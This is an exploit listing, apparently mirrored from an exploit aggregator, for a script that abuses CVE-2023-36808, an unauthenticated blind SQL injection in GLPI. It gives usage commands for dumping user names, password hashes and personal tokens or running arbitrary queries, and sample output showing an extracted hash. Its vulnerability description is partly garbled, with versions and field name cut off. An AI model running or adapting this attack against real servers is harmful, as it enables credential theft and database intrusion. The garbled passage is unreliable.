Exploit for SQL Injection in Glpi-Project Glpi CVE-2023-36808

## https://sploitus.com/exploit?id=9BC08ADB-8F4F-5010-BDA8-9F36150A79A7
# CVE-2023-36808 - GLPI Unauthenticated SQL Injection

## Vulnerability

GLPI versions **` field is injected directly into a SQL query without sanitisation:

```sql
SELECT id FROM glpi_agents WHERE deviceid = ''
```

No authentication is required. The vulnerability allows full database read access via blind SQL injection.

## Exploit

This script uses **time-based blind injection with binary search** to extract data significantly faster than generic tools.

- One SLEEP per boolean check (reliable regardless of table size)
- Binary search: ~7 requests per character instead of 95
- Field-level parallelism: name, password, and token extracted simultaneously per user
- Concurrency cap prevents timing interference between parallel requests

### Requirements

```bash
pip install -r requirements.txt
```

### Usage

```bash
# Dump the full glpi_users table (name, password hash, personal_token)
python3 exploit.py http:///glpi

# Custom SQL query
python3 exploit.py http:///glpi --query "SELECT @@version"

# Tune timing (lower sleep = faster, increase if you get wrong results)
python3 exploit.py http:///glpi --sleep 0.3

# Increase parallel request cap (default 2, raise on high-latency remote targets)
python3 exploit.py http:///glpi --parallel 4
```

### Example output

```
[*] CVE-2023-36808 - GLPI Unauthenticated SQLi
[*] Target : http://10.0.0.1/glpi/front/inventory.php
[*] Sleep  : 0.5s  Threshold: 0.35s  Parallel: 2

[+] Target reachable
[+] Injection confirmed

[*] User 1/7
  name               glpi
  password           $2y$10$xN.12pQxSLlQdMJzP26EWe...
  personal_token     xxxx
...
```

## References

- [NVD - CVE-2023-36808](https://nvd.nist.gov/vuln/detail/CVE-2023-36808)
- [GLPI Security Advisory](https://github.com/glpi-project/glpi/security/advisories/GHSA-f3vh-qmxj-43rm)